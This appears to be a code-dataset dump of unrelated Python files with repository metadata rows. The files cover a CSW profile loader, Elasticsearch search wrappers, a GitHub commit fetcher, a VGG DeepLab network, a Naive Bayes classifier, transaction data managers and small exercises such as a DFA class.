# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# =================================================================
import os
import warnings
class Profile(object):
''' base Profile class '''
def __init__(self, name, version, title, url,
namespace, typename, outputschema, prefixes, model, core_namespaces,
added_namespaces,repository):
''' Initialize profile '''
self.name = name
self.version = version
self.title = title
self.url = url
self.namespace = namespace
self.typename = typename
self.outputschema = outputschema
self.prefixes = prefixes
self.repository = repository
if 'DescribeRecord' in model['operations']:
model['operations']['DescribeRecord']['parameters']\
['typeName']['values'].append(self.typename)
model['operations']['GetRecords']['parameters']['outputSchema']\
['values'].append(self.outputschema)
model['operations']['GetRecords']['parameters']['typeNames']\
['values'].append(self.typename)
model['operations']['GetRecordById']['parameters']['outputSchema']\
['values'].append(self.outputschema)
if 'Harvest' in model['operations']:
model['operations']['Harvest']['parameters']['ResourceType']\
['values'].append(self.outputschema)
# namespaces
core_namespaces.update(added_namespaces)
# repository
model['typenames'][self.typename] = self.repository
def extend_core(self, model, namespaces, config):
''' Extend config.model and config.namespaces '''
raise NotImplementedError
def check_parameters(self):
''' Perform extra parameters checking.
Return dict with keys "locator", "code", "text" or None '''
raise NotImplementedError
def get_extendedcapabilities(self):
''' Return ExtendedCapabilities child as lxml.etree.Element '''
raise NotImplementedError
def get_schemacomponents(self):
''' Return schema components as lxml.etree.Element list '''
raise NotImplementedError
def check_getdomain(self, kvp):
'''Perform extra profile specific checks in the GetDomain request'''
raise NotImplementedError
def write_record(self, result, esn, outputschema, queryables):
''' Return csw:SearchResults child as lxml.etree.Element '''
raise NotImplementedError
def transform2dcmappings(self, queryables):
''' Transform information model mappings into csw:Record mappings '''
raise NotImplementedError
def load_profiles(path, cls, profiles):
''' load CSW profiles, return dict by class name '''
def look_for_subclass(modulename):
module = __import__(modulename)
dmod = module.__dict__
for modname in modulename.split('.')[1:]:
dmod = dmod[modname].__dict__
for key, entry in dmod.items():
if key == cls.__name__:
continue
try:
if issubclass(entry, cls):
aps['plugins'][key] = entry
except TypeError:
continue
aps = {}
aps['plugins'] = {}
aps['loaded'] = {}
for prof in profiles.split(','):
# fgdc, atom, dif, gm03 are supported in core
# no need to specify them explicitly anymore
# provide deprecation warning
# https://github.com/geopython/pycsw/issues/118
if prof in ['fgdc', 'atom', 'dif', 'gm03']:
warnings.warn('%s is now a core module, and does not need to be'
' specified explicitly. So you can remove %s from '
'server.profiles' % (prof, prof))
else:
modulename='%s.%s.%s' % (path.replace(os.sep, '.'), prof, prof)
look_for_subclass(modulename)
return aps
| 36.528169 | 78 | 0.630037 |
c47ed8028e53c0742399199be9ea4ca791d59010
| 1,108 |
py
|
Python
|
datahandler/analyser.py
|
ameliecordier/IIK
|
57b40d6b851a1c2369604049d1820e5b572c6227
|
[
"MIT"
] | null | null | null |
datahandler/analyser.py
|
ameliecordier/IIK
|
57b40d6b851a1c2369604049d1820e5b572c6227
|
[
"MIT"
] | null | null | null |
datahandler/analyser.py
|
ameliecordier/IIK
|
57b40d6b851a1c2369604049d1820e5b572c6227
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import csv
from matplotlib import pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
def isValid(p, ep):
return p in ep.patterns
# CLASS ANALYSER
class Analyser:
"""
Représentation d'un résultat d'analyse
"""
def __init__(self):
"""
:param results: contient les résultats de l'analyse
"""
self.results = []
def addResult(self, result):
"""
Ajoute une liste de résultats à l'ensemble des résultats
:param result: la ligne de résultats
:return: None
"""
self.results.append(result)
def __str__(self):
"""
Affichage des résultats sur la sortie standard
"""
return "Résultats : %r" % self.results
def toFile(self, filename):
with open(filename, "w") as outfile:
fieldnames = ['idxExpert', 'idxMining', 'pattern expert', 'pattern mining' , 'full pattern']
w = csv.DictWriter(outfile, delimiter=";", fieldnames=fieldnames)
w.writeheader()
w.writerows(self.results)
| 25.181818 | 104 | 0.598375 |
3f28d1e2f76100adc00945a0759d254a0a1638b4
| 20 |
py
|
Python
|
RDS/circle3_central_services/research_manager/src/api/User/__init__.py
|
Sciebo-RDS/Sciebo-RDS
|
d71cf449ed045a2a7a049e2cb77c99fd5a9195bd
|
[
"MIT"
] | 10 |
2020-06-24T08:22:24.000Z
|
2022-01-13T16:17:36.000Z
|
RDS/circle3_central_services/research_manager/src/api/User/__init__.py
|
Sciebo-RDS/Sciebo-RDS
|
d71cf449ed045a2a7a049e2cb77c99fd5a9195bd
|
[
"MIT"
] | 78 |
2020-01-23T14:32:06.000Z
|
2022-03-07T14:11:16.000Z
|
RDS/circle3_central_services/research_manager/src/api/User/__init__.py
|
Sciebo-RDS/Sciebo-RDS
|
d71cf449ed045a2a7a049e2cb77c99fd5a9195bd
|
[
"MIT"
] | 1 |
2020-06-24T08:33:48.000Z
|
2020-06-24T08:33:48.000Z
|
from .user import *
| 20 | 20 | 0.7 |
3f418694dc8e68bdf0bfc91861f5c5eb0502eab0
| 5,495 |
py
|
Python
|
src/onegov/search/dsl.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/search/dsl.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/search/dsl.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from elasticsearch_dsl import Search as BaseSearch
from elasticsearch_dsl.response import Hit as BaseHit
from elasticsearch_dsl.response import Response as BaseResponse
def type_from_hit(hit):
return hit.meta.index.split('-')[-2]
class Search(BaseSearch):
""" Extends elastichsearch_dsl's search object with ORM integration.
Works exactly the same as the original, but the results it returns offer
additional methods to query the SQLAlchemy models behind the results (if
any).
"""
def __init__(self, *args, **kwargs):
# get the session and mapping if possilbe (not provided during cloning)
self.session = kwargs.pop('session', None)
self.mappings = kwargs.pop('mappings', None)
super().__init__(*args, **kwargs)
# bind responses to the orm
self._response_class = Response.bind(
self.session, self.mappings, self.explain)
@property
def explain(self):
return self._extra.get('explain', False)
def _clone(self):
search = super()._clone()
search.session = self.session
search.mappings = self.mappings
return search
def _get_result(self, *args, **kwargs):
result = super()._get_result(*args, **kwargs)
result.__class__ = Hit.bind(
session=self.session,
model=self.mappings[type_from_hit(result)].model
)
return result
class Response(BaseResponse):
""" Extends the default response (list of results) with additional
methods to query the SQLAlchemy models behind the results.
"""
@classmethod
def bind(cls, session, mappings, explain):
class BoundResponse(cls):
pass
BoundResponse.session = session
BoundResponse.mappings = mappings
BoundResponse.explain = explain
return BoundResponse
def hits_by_type(self, type):
for hit in self.hits:
if type_from_hit(hit) == type:
yield hit
def query(self, type):
""" Returns an SQLAlchemy query for the given type. You must provide
a type, because a query can't consist of multiple unrelated tables.
If no results match the type, None is returned.
"""
hits = list(self.hits_by_type(type))
if not hits:
return None
model = self.mappings[type].model
query = self.session.query(model)
model_ids = (h.meta.id for h in hits)
query = query.filter(getattr(model, model.es_id).in_(model_ids))
return query
def load(self):
""" Loads all results by querying the SQLAlchemy session in the order
they were returned by elasticsearch.
Note that the resulting lists may include None values, since we are
might get elasticsearch results for which we do not have a model
on the database (the data is then out of sync).
"""
positions = {}
types = set()
# put the types into buckets and store the original position...
for ix, hit in enumerate(self.hits):
type = type_from_hit(hit)
positions[(type, str(hit.meta.id))] = ix
types.add(type)
results = [None] * len(positions)
# ...so we can query the database once per type and not once per result
# this has the potential of resulting in fewer queries
for type in types:
for result in self.query(type):
object_id = str(getattr(result, result.es_id))
ix = positions[(type, object_id)]
if self.explain:
ex = self.hits[ix].meta.explanation
result.explanation = {
'raw': ex.__dict__,
'score': self.hits[ix].meta.score,
'term-frequency': explanation_value(
ex, 'termFreq'
),
'inverse-document-frequency': explanation_value(
ex, 'idf'
),
'field-norm': explanation_value(
ex, 'fieldNorm'
)
}
results[ix] = result
return results
def explanation_value(explanation, text):
""" Gets the value from the explanation for descriptions starting with
the given text.
"""
if explanation.description.startswith(text):
return {
'description': explanation.description,
'value': explanation.value
}
for detail in getattr(explanation, 'details', []):
result = explanation_value(detail, text)
if result:
return result
class Hit(BaseHit):
""" Extends a single result with additional methods to query the SQLAlchemy
models behind the results.
"""
@classmethod
def bind(cls, model, session):
class BoundHit(cls):
pass
BoundHit.model = model
BoundHit.session = session
return BoundHit
def query(self):
""" Returns the SQLAlchemy query for this result. """
query = self.session.query(self.model)
model_id = getattr(self.model, self.model.es_id)
query = query.filter(model_id == self.meta.id)
return query
def load(self):
""" Loads this result from the SQLAlchemy session. """
return self.query().one()
| 28.471503 | 79 | 0.589263 |
3f4d7a70b7445e8fd4a01a87b193501aed45d294
| 2,944 |
py
|
Python
|
PyStellar/stellar/Git/service/git_commit_service.py
|
psgstellar/Stellar
|
947d4b3d9d6b9c74d4c9ebd29683793a8d86fad2
|
[
"Apache-2.0"
] | 3 |
2021-01-24T17:07:55.000Z
|
2021-02-20T20:11:13.000Z
|
PyStellar/stellar/Git/service/git_commit_service.py
|
psgstellar/Stellar
|
947d4b3d9d6b9c74d4c9ebd29683793a8d86fad2
|
[
"Apache-2.0"
] | 61 |
2021-01-10T12:59:01.000Z
|
2021-06-24T09:19:20.000Z
|
PyStellar/stellar/Git/service/git_commit_service.py
|
psgstellar/Stellar
|
947d4b3d9d6b9c74d4c9ebd29683793a8d86fad2
|
[
"Apache-2.0"
] | 1 |
2021-01-14T05:23:32.000Z
|
2021-01-14T05:23:32.000Z
|
import requests
import dateutil.parser
import pytz
from Git.dao.git_dao import GitOwnerRepo
class GitCommitCheckService:
"""Github Public 저장소 커밋 기록 가져오기"""
@classmethod
def git_public_request(cls, request):
"""Commit 기록 요청"""
owner = request.GET['owner']
repo = request.GET['repo']
token = request.GET['token']
if request.GET.get('since', '') and request.GET.get('until', ''):
since = request.GET['since']
until = request.GET['until']
r = requests.get(f'https://api.github.com/repos/{owner}/{repo}/commits?my_client_id={owner}&since={since}&until={until}', headers={'Authorization': 'token '+token})
elif request.GET.get('since', ''):
since = request.GET['since']
r = requests.get(f'https://api.github.com/repos/{owner}/{repo}/commits?my_client_id={owner}&since={since}', headers={'Authorization': 'token '+token})
elif request.GET.get('until', ''):
until = request.GET['until']
r = requests.get(f'https://api.github.com/repos/{owner}/{repo}/commits?my_client_id={owner}&until={until}', headers={'Authorization': 'token '+token})
else:
r = requests.get(f'https://api.github.com/repos/{owner}/{repo}/commits?my_client_id={owner}', headers={'Authorization': 'token '+token})
data = r.json()
commit_json = None
commit_info = [None] * 4
if str(type(data)) == "<class 'list'>":
if str(data) != '[]':
local_timezone = pytz.timezone('Asia/Seoul')
commit_json = []
for i in data:
for k, v in i.items():
if k == 'commit':
commit_info[1] = v['message']
commit_info[2] = (dateutil.parser.parse(v['author']['date'])).replace(tzinfo=pytz.utc).astimezone(local_timezone)
elif k == 'author':
commit_info[0] = v['login']
elif k == 'html_url':
commit_info[3] = v
commit_json.append({'username': commit_info[0],
'message': commit_info[1],
'date': commit_info[2],
'url': commit_info[3]})
else:
commit_json = [{'username': owner, 'message': 'Fault Token Info OR Repo Info', 'date': None, 'url': None}]
return commit_json
@classmethod
def git_commit_insert(cls, commit_list):
""" 깃 커밋 리스트를 디비에 저장"""
list_tuple = []
for i in commit_list:
list_tuple.append(tuple(i.values()))
insert_commit = GitOwnerRepo()
return_json = insert_commit.insert_git_commit(list_tuple)
return return_json
| 43.940299 | 176 | 0.52038 |
58c4179e5713c05abfe6169f74df8cd9ca6987a4
| 5,558 |
py
|
Python
|
model/vgg_deeplab.py
|
ireina7/zero-shot-segmentation
|
870d08ad7ea3965f006d0eb44667f6ecd87ef205
|
[
"MIT"
] | null | null | null |
model/vgg_deeplab.py
|
ireina7/zero-shot-segmentation
|
870d08ad7ea3965f006d0eb44667f6ecd87ef205
|
[
"MIT"
] | null | null | null |
model/vgg_deeplab.py
|
ireina7/zero-shot-segmentation
|
870d08ad7ea3965f006d0eb44667f6ecd87ef205
|
[
"MIT"
] | null | null | null |
import torchvision
import torch
import torch.nn as nn
import torch.nn.functional as F
class Vgg_Deeplab(nn.Module):
def __init__(self,*args, **kwargs):
super(Vgg_Deeplab, self).__init__()
vgg16 = torchvision.models.vgg16()
layers = []
layers.append(nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.MaxPool2d(3, stride=2, padding=1))
layers.append(nn.Conv2d(64, 128, kernel_size=3, stride=1, padding=1))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.Conv2d(128, 128, kernel_size=3, stride=1, padding=1))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.MaxPool2d(3, stride=2, padding=1))
layers.append(nn.Conv2d(128, 256, kernel_size=3, stride=1, padding=1))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.MaxPool2d(3, stride=2, padding=1))
layers.append(nn.Conv2d(256, 512, kernel_size=3, stride=1, padding=1))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.MaxPool2d(3, stride=1, padding=1))
layers.append(nn.Conv2d(512,
512,
kernel_size=3,
stride=1,
padding=2,
dilation=2))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.Conv2d(512,
512,
kernel_size=3,
stride=1,
padding=2,
dilation=2))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.Conv2d(512,
512,
kernel_size=3,
stride=1,
padding=2,
dilation=2))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.MaxPool2d(3, stride=1, padding=1))
self.features = nn.Sequential(*layers)
classifier = []
classifier.append(nn.AvgPool2d(3, stride=1, padding=1))
classifier.append(nn.Conv2d(512,
1024,
kernel_size=3,
stride=1,
padding=12,
dilation=12))
classifier.append(nn.ReLU(inplace=True))
classifier.append(nn.Dropout(p=0.5))
self.classifier = nn.Sequential(*classifier)
self.init_weights()
def forward(self, x):
x = self.features(x)
x = self.classifier(x)
return x
def init_weights(self):
vgg = torchvision.models.vgg16(pretrained=True)
state_vgg = vgg.features.state_dict()
self.features.load_state_dict(state_vgg)
for ly in self.classifier.children():
if isinstance(ly, nn.Conv2d):
nn.init.kaiming_normal_(ly.weight, a=1)
nn.init.constant_(ly.bias, 0)
def get_1x_lr_params(self):
"""
This generator returns all the parameters for the last layer of the net,
which does the classification of pixel into classes
"""
# b = []
#
# b.append(self.conv1)
# b.append(self.bn1)
# b.append(self.layer1)
# b.append(self.layer2)
# b.append(self.layer3)
# b.append(self.layer4)
for i in self.features:
#for j in self.features[i].modules():
jj = 0
for k in i.parameters():
jj += 1
if k.requires_grad:
yield k
def optim_parameters_1x(self, args):
return [{"params": self.get_1x_lr_params(), "lr": 1 * args.learning_rate}]
def get_10x_lr_params(self):
"""
This generator returns all the parameters for the last layer of the net,
which does the classification of pixel into classes
"""
# b = []
# b.append(self.layer.parameters())
for i in self.classifier:
#for j in self.classifier[i].modules():
jj = 0
for k in i.parameters():
jj += 1
if k.requires_grad:
yield k
def optim_parameters_10x(self, args):
return [{"params": self.get_10x_lr_params(), "lr": 10 * args.learning_rate}]
if __name__ == "__main__":
net = Vgg_Deeplab(3, 10)
in_ten = torch.randn(1, 3, 224, 224)
out = net(in_ten)
print(net)
print(out.size())
in_ten = torch.randn(1, 3, 64, 64)
mod = nn.Conv2d(3,
512,
kernel_size=3,
stride=1,
padding=2,
dilation=2)
out = mod(in_ten)
print(out.shape)
| 35.858065 | 84 | 0.526268 |
58dc98f64796c7f6f0664ca055829713dcb9192e
| 3,662 |
py
|
Python
|
_Dist/NeuralNetworks/b_TraditionalML/MultinomialNB.py
|
leoatchina/MachineLearning
|
071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3
|
[
"MIT"
] | 1,107 |
2016-09-21T02:18:36.000Z
|
2022-03-29T02:52:12.000Z
|
_Dist/NeuralNetworks/b_TraditionalML/MultinomialNB.py
|
leoatchina/MachineLearning
|
071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3
|
[
"MIT"
] | 18 |
2016-12-22T10:24:47.000Z
|
2022-03-11T23:18:43.000Z
|
_Dist/NeuralNetworks/b_TraditionalML/MultinomialNB.py
|
leoatchina/MachineLearning
|
071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3
|
[
"MIT"
] | 776 |
2016-12-21T12:08:08.000Z
|
2022-03-21T06:12:08.000Z
|
import numpy as np
from sklearn.preprocessing import OneHotEncoder
class MultinomialNB:
""" Naive Bayes algorithm with discrete inputs
Parameters
----------
alpha : float, optional (default=1.)
Smooth parameter used in Naive Bayes, default is 1 (which indicates a laplace smoothing)
Attributes
----------
enc : OneHotEncoder
One-Hot encoder used to transform (discrete) inputs
class_log_prior : np.ndarray of float
Log class prior used to calculate (linear) prediction
feature_log_prob : np.ndarray of float
Feature log probability used to calculate (linear) prediction
Examples
--------
>>> import numpy as np
>>> x = np.random.randint(0, 10, [1000, 10]) # Generate feature vectors
>>> y = np.random.randint(0, 5, 1000) # Generate labels
>>> nb = MultinomialNB().fit(x, y) # fit the model
>>> nb.predict(x) # (linear) prediction
>>> nb.predict_class(x) # predict labels
"""
def __init__(self, alpha=1.):
self.alpha = alpha
self.enc = self.class_log_prior = self.feature_log_prob = None
def fit(self, x, y, do_one_hot=True):
""" Fit the model with x & y
Parameters
----------
x : {list of float, np.ndarray of float}
Feature vectors used for training
Note: features are assumed to be discrete
y : {list of float, np.ndarray of float}
Labels used for training
do_one_hot : bool, optional (default=True)
Whether do one-hot encoding on x
Returns
-------
self : MultinomialNB
Returns self.
"""
if do_one_hot:
self.enc = OneHotEncoder(dtype=np.float32)
x = self.enc.fit_transform(x)
else:
self.enc = None
x = np.array(x, np.float32)
n = x.shape[0]
y = np.array(y, np.int8)
self.class_log_prior = np.log(np.bincount(y) / n)
masks = [y == i for i in range(len(self.class_log_prior))]
masked_xs = [x[mask] for mask in masks]
feature_counts = np.array([np.asarray(masked_x.sum(0))[0] for masked_x in masked_xs])
smoothed_fc = feature_counts + self.alpha
self.feature_log_prob = np.log(smoothed_fc / smoothed_fc.sum(1, keepdims=True))
return self
def _predict(self, x):
""" Internal method for calculating (linear) predictions
Parameters
----------
x : {np.ndarray of float, scipy.sparse.csr.csr_matrix of float}
One-Hot encoded feature vectors
Returns
-------
predictions : np.ndarray of float
Returns (linear) predictions.
"""
return x.dot(self.feature_log_prob.T) + self.class_log_prior
def predict(self, x):
""" API for calculating (linear) predictions
Parameters
----------
x : {list of float, np.ndarray of float}
Target feature vectors
Returns
-------
predictions : np.ndarray of float
Returns (linear) predictions.
"""
if self.enc is not None:
x = self.enc.transform(x)
return self._predict(x)
def predict_class(self, x):
""" API for predicting labels
Parameters
----------
x : {list of float, np.ndarray of float}
Target feature vectors
Returns
-------
labels : np.ndarray of int
Returns labels.
"""
return np.argmax(self.predict(x), 1)
| 29.296 | 96 | 0.560896 |
18a994a759d85007cf88e43e5353bf80d7ac9a5c
| 3,055 |
py
|
Python
|
src/onegov/core/datamanager.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/core/datamanager.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/core/datamanager.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
import os
import tempfile
import transaction
from onegov.core import log
from onegov.core.utils import safe_move
class MailDataManager(object):
""" Takes a postman and an envelope and sends it when the transaction
is commited.
Since we can't really know if a mail can be sent until it happens, we
simply log an exception if the sending failed.
"""
transaction_manager = transaction.manager
def __init__(self, postman, envelope):
self.postman = postman
self.envelope = envelope
@classmethod
def send_email(cls, postman, envelope):
transaction.get().join(cls(postman, envelope))
def sortKey(self):
return 'mails'
def bind_connection(self, transaction, connection):
assert 'mail_connection' not in transaction.extension
def after_commit_hook(*args):
connection.quit()
transaction.addAfterCommitHook(after_commit_hook)
transaction.extension['mail_connection'] = connection
def open_connection(self):
connection = self.postman.transport(
self.postman.host,
self.postman.port,
**self.postman.options
)
connection.ehlo()
for item in self.postman.middlewares:
item(connection)
return connection
def commit(self, transaction):
if 'mail_connection' not in transaction.extension:
self.bind_connection(transaction, self.open_connection())
try:
self.postman.deliver(
transaction.extension['mail_connection'],
self.envelope
)
except Exception:
log.exception("Failed to send e-mail")
def abort(self, transaction):
pass
def tpc_vote(self, transaction):
pass
def tpc_abort(self, transaction):
pass
def tpc_begin(self, transaction):
pass
def tpc_finish(self, transaction):
pass
class FileDataManager(object):
""" Writes a file when the transaction is commited. """
transaction_manager = transaction.manager
def __init__(self, data, path):
self.data = data
self.path = path
@classmethod
def write_file(cls, data, path):
transaction.get().join(cls(data, path))
def sortKey(self):
return 'files'
def commit(self, transaction):
with tempfile.NamedTemporaryFile(delete=False) as temp:
self.tempfn = temp.name
temp.write(self.data)
def abort(self, transaction):
pass
def tpc_vote(self, transaction):
if not os.path.exists(self.tempfn):
raise ValueError('%s doesnt exist' % self.tempfn)
if os.path.exists(self.path):
raise ValueError('file already exists')
def tpc_abort(self, transaction):
try:
os.remove(self.tempfn)
except OSError:
pass
def tpc_begin(self, transaction):
pass
def tpc_finish(self, transaction):
safe_move(self.tempfn, self.path)
| 24.637097 | 73 | 0.629133 |
18ad36444d5128007b08506ac3f31875adc10b4d
| 127 |
py
|
Python
|
books/SystemProgramming/ch4_advanced/echo_command.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
books/SystemProgramming/ch4_advanced/echo_command.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
books/SystemProgramming/ch4_advanced/echo_command.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
from subprocess import Popen, PIPE
cmd = "echo hello world"
p = Popen(cmd, shell=True, stdout=PIPE)
ret, err = p.communicate()
| 25.4 | 39 | 0.724409 |
18d67d5d9fabdd711ac5fef81a528edb66bc9e9b
| 136 |
py
|
Python
|
lms_python/lms_app/admin.py
|
gabrielmdsantos/LMSBD
|
dff3001a560f8cccb938957bf2d5732d4ae3d163
|
[
"Apache-2.0"
] | null | null | null |
lms_python/lms_app/admin.py
|
gabrielmdsantos/LMSBD
|
dff3001a560f8cccb938957bf2d5732d4ae3d163
|
[
"Apache-2.0"
] | null | null | null |
lms_python/lms_app/admin.py
|
gabrielmdsantos/LMSBD
|
dff3001a560f8cccb938957bf2d5732d4ae3d163
|
[
"Apache-2.0"
] | null | null | null |
from django.contrib import admin
from lms_app.models import Professor
admin.site.register(Professor)
# Register your models here.
| 22.666667 | 37 | 0.794118 |
18ea8109933fbbfe2b0922e33bce91ae934e86e1
| 2,010 |
py
|
Python
|
StateTracing/tester_helper.py
|
junchenfeng/diagnosis_tracing
|
4e26e2ad0c7abc547f22774b6c9c299999a152c3
|
[
"MIT"
] | null | null | null |
StateTracing/tester_helper.py
|
junchenfeng/diagnosis_tracing
|
4e26e2ad0c7abc547f22774b6c9c299999a152c3
|
[
"MIT"
] | null | null | null |
StateTracing/tester_helper.py
|
junchenfeng/diagnosis_tracing
|
4e26e2ad0c7abc547f22774b6c9c299999a152c3
|
[
"MIT"
] | 1 |
2020-09-08T13:42:16.000Z
|
2020-09-08T13:42:16.000Z
|
# -*- coding: utf-8 -*-
import numpy as np
from torch import load as Tload
from torch import tensor
from dataloader import read_data,DataLoader,load_init
from cdkt import CDKT
if 'model' not in dir():
model = CDKT()
model.load_state_dict(Tload('model.pkl'))
#
inits = load_init()
data = """0 506123310064654031030450460312100605
0 506123310064654031230450460312100605
0 506123310064654031231450460312100605
0 506123310064654031231456460312100605
0 506123310064654031231456460312100645
0 506123310564654031231456460312100645
0 506123310564654231231456460312100645
0 506123310564654231231456460312100605
0 506123310564654231231456460312100645
0 506123312564654231231456460312100645
0 546123312564654231231456460312100645
0 546123312564654231231456465312100645
0 546123312564654231231456465312120645
0 546123312564654231231456465312123645
1 002163163050030425245001316542000000
1 002163163054030425245001316542000000
1 002163163054030425245001316542000006"""
# 1 002163163054030425245001316542030006
# 1 002163163054030425245001316542000006
# 1 002163163054031425245001316542000006
# 1 002163163054631425245001316542000006
# 1 002163163254631425245001316542000006
# 1 002163163254631425245601316542000006
# 1 002163163254631425245631316542000006
# 1 052163163254631425245631316542000006
# 1 452163163254631425245631316542000006
# 1 452163163254631425245631316542000016
# 1 452163163254631425245631316542000316
# 1 452163163254631425245631316542003316
# 1 452163163254631425245631316542000316
# 1 452163163254631425245631316542500316
# 1 452163163254631425245631316542520316
# 1 452163163254631425245631316542524316"""
data = [d.strip().split() for d in data.split('\n')]
states = [list(map(int,s)) for i,s in data]
states = tensor([states])
out = model.predicts(states)
prds = np.argmax(out[0],axis=2).flatten()*np.array(inits[2])
| 35.892857 | 60 | 0.783085 |
36a322147c11bf81187e2fb1867ec7eedebfc053
| 1,663 |
py
|
Python
|
COMP/W01/class_DFA.py
|
joao-frohlich/BCC
|
9ed74eb6d921d1280f48680677a2140c5383368d
|
[
"Apache-2.0"
] | 10 |
2020-12-08T20:18:15.000Z
|
2021-06-07T20:00:07.000Z
|
COMP/W01/class_DFA.py
|
joao-frohlich/BCC
|
9ed74eb6d921d1280f48680677a2140c5383368d
|
[
"Apache-2.0"
] | 2 |
2021-06-28T03:42:13.000Z
|
2021-06-28T16:53:13.000Z
|
COMP/W01/class_DFA.py
|
joao-frohlich/BCC
|
9ed74eb6d921d1280f48680677a2140c5383368d
|
[
"Apache-2.0"
] | 2 |
2021-01-14T19:59:20.000Z
|
2021-06-15T11:53:21.000Z
|
class DFA:
current_state = None
current_letter = None
valid = True
def __init__(
self, name, alphabet, states, delta_function, start_state, final_states
):
self.name = name
self.alphabet = alphabet
self.states = states
self.delta_function = delta_function
self.start_state = start_state
self.final_states = final_states
self.current_state = start_state
def transition_to_state_with_input(self, letter):
if self.valid:
if (self.current_state, letter) not in self.delta_function.keys():
self.valid = False
return
self.current_state = self.delta_function[(self.current_state, letter)]
self.current_letter = letter
else:
return
def in_accept_state(self):
return self.current_state in self.final_states and self.valid
def go_to_initial_state(self):
self.current_letter = None
self.valid = True
self.current_state = self.start_state
def run_with_word(self, word):
self.go_to_initial_state()
for letter in word:
self.transition_to_state_with_input(letter)
continue
return self.in_accept_state()
def run_with_letters(self, word):
self.go_to_initial_state()
for letter in word:
if self.run_with_letter(letter):
return
else:
return
def run_with_letter(self, letter):
self.transition_to_state_with_input(letter)
return self.current_state
def __len__(self):
return len(self.states)
| 29.175439 | 82 | 0.623572 |
181dd4525734f8cc34fa28f835971bb355463f95
| 516 |
py
|
Python
|
src/removeElement.py
|
ianxin/algorithm
|
22214b6c81bee926f5a1c74c9417b2e7edd3ceed
|
[
"MIT"
] | 2 |
2018-03-13T08:59:14.000Z
|
2018-03-13T08:59:25.000Z
|
src/removeElement.py
|
ianxin/Algorithm
|
22214b6c81bee926f5a1c74c9417b2e7edd3ceed
|
[
"MIT"
] | null | null | null |
src/removeElement.py
|
ianxin/Algorithm
|
22214b6c81bee926f5a1c74c9417b2e7edd3ceed
|
[
"MIT"
] | null | null | null |
"""
@param: A: A list of integers
@param: elem: An integer
@return: The new length after remove
"""
#倒序遍历list
def removeElement(self, A, elem):
# write your code here
for i in range(len(A)-1,-1,-1):
if A[i] == elem:
A.pop(i)
return len(A)
#遍历拷贝的list ,操作原始list
def removeElement(self, A, elem):
# write your code here
for i in A[:]:
if i == elem:
A.remove(i)
return len(A)
| 23.454545 | 40 | 0.484496 |
1878e0fb7794287a25d9e67514272eb4ae4e8c3c
| 148 |
py
|
Python
|
WD/Cwiczenia/rzymskie.py
|
galursa/UWM
|
b7ab4a275662764a91af6c5bc79da0d98177d0ac
|
[
"MIT"
] | 1 |
2020-02-29T14:38:33.000Z
|
2020-02-29T14:38:33.000Z
|
WD/Cwiczenia/rzymskie.py
|
galursa/UWM
|
b7ab4a275662764a91af6c5bc79da0d98177d0ac
|
[
"MIT"
] | null | null | null |
WD/Cwiczenia/rzymskie.py
|
galursa/UWM
|
b7ab4a275662764a91af6c5bc79da0d98177d0ac
|
[
"MIT"
] | null | null | null |
